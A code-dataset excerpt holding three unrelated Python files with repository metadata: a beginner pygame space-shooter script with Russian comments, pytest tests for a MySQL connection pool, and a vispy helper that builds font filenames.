] | null | null | null | shuter/shooter_game.py | vlax679/shuter | 8df27dfc9f6686df4f7b97ac831fb9518ea7da95 | [
"CC0-1.0"
] | null | null | null | shuter/shooter_game.py | vlax679/shuter | 8df27dfc9f6686df4f7b97ac831fb9518ea7da95 | [
"CC0-1.0"
] | null | null | null | from pygame import *
#создай окно игры
window = display.set_mode((800,600))
display.set_caption("Шутер")
background = transform.scale(image.load("galaxy.jpg"),(800,600))
#задай фон сцены
clock = time.Clock()
FPS = 100
#создай 2 спрайта и размести их на сцене
mixer.init()
mixer.music.load("space.ogg")
mixer.music.play()
#обработай событие «клик по кнопке "Закрыть окно"»
class Player(sprite.Sprite):
def __init__(self,picture,speed,sx,sy,window):
self.picture = picture
self.speed = speed
self.sx = sx
self.sy = sy
self.sub = transform.scale(image.load(self.picture),(100,100))
self.window = window
def update(self):
self.window.blit(self.sub,(self.sx,self.sy))
keys_pressed = key.get_pressed()
if keys_pressed[K_d] and self.sx < 800:
self.sx += self.speed
if keys_pressed[K_a] and self.sx >0:
self.sx -= self.speed
x = 3
y = 500
game = True
player = Player("rocket.png",10,x,y,window)
while game:
window.blit(background,(0,0))
player.update()
for e in event.get():
if e.type == QUIT:
game=False
clock.tick(FPS)
| 25.369565 | 70 | 0.634105 |
2ba6252815a9e7af063eb544b38007c502f9003b | 847 | py | Python | tests/test_mysql_connection_pool.py | maypimentel/mysql_connection_pool | a6d193ee62d24fbc9aec449dd3bc9bf00375927d | [
"MIT"
] | null | null | null | tests/test_mysql_connection_pool.py | maypimentel/mysql_connection_pool | a6d193ee62d24fbc9aec449dd3bc9bf00375927d | [
"MIT"
] | null | null | null | tests/test_mysql_connection_pool.py | maypimentel/mysql_connection_pool | a6d193ee62d24fbc9aec449dd3bc9bf00375927d | [
"MIT"
] | null | null | null | import pytest
from mysql_connection_pool import MysqlPool
from mysql.connector import MySQLConnection
from mysql.connector.errors import PoolError
class TestMysqlConnectionPool:
def setup_method(self, method):
self.pool = MysqlPool(pool_size=2, pool_max_size=2)
def test_cnx_type(self):
cnx = self.pool.get_connection()
assert isinstance(cnx, MySQLConnection)
def test_cnx_and_cursor(self):
cnx = self.pool.get_connection()
cursor = cnx.cursor()
cursor.execute('SELECT * FROM book LIMIT 1;')
cursor.fetchall()
assert cursor.rowcount == 1
def test_pool_empty(self):
cnx1 = self.pool.get_connection()
cnx2 = self.pool.get_connection()
with pytest.raises(PoolError, match='Pool exhausted'):
cnx3 = self.pool.get_connection()
| 31.37037 | 62 | 0.68477 |
335ebe7bff7191a76f4fdddea8e48d3a68f98df0 | 747 | py | Python | vispy/util/fonts/_vispy_fonts.py | shjoshi/vispy | 2f3d169aa60c738467e766c59096f51570483d6f | [
"BSD-3-Clause"
] | null | null | null | vispy/util/fonts/_vispy_fonts.py | shjoshi/vispy | 2f3d169aa60c738467e766c59096f51570483d6f | [
"BSD-3-Clause"
] | null | null | null | vispy/util/fonts/_vispy_fonts.py | shjoshi/vispy | 2f3d169aa60c738467e766c59096f51570483d6f | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
from .._data import get_data_file
# List the vispy fonts made available online
_vispy_fonts = ('OpenSans', 'Cabin')
def _get_vispy_font_filename(face, bold, italic):
"""Fetch a remote vispy font"""
name = face + '-'
name += 'Regular' if not bold and not italic else ''
name += 'Bold' if bold else ''
name += 'Italic' if italic else ''
name += '.ttf'
return get_data_file('fonts/%s' % name)
| 35.571429 | 79 | 0.519411 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.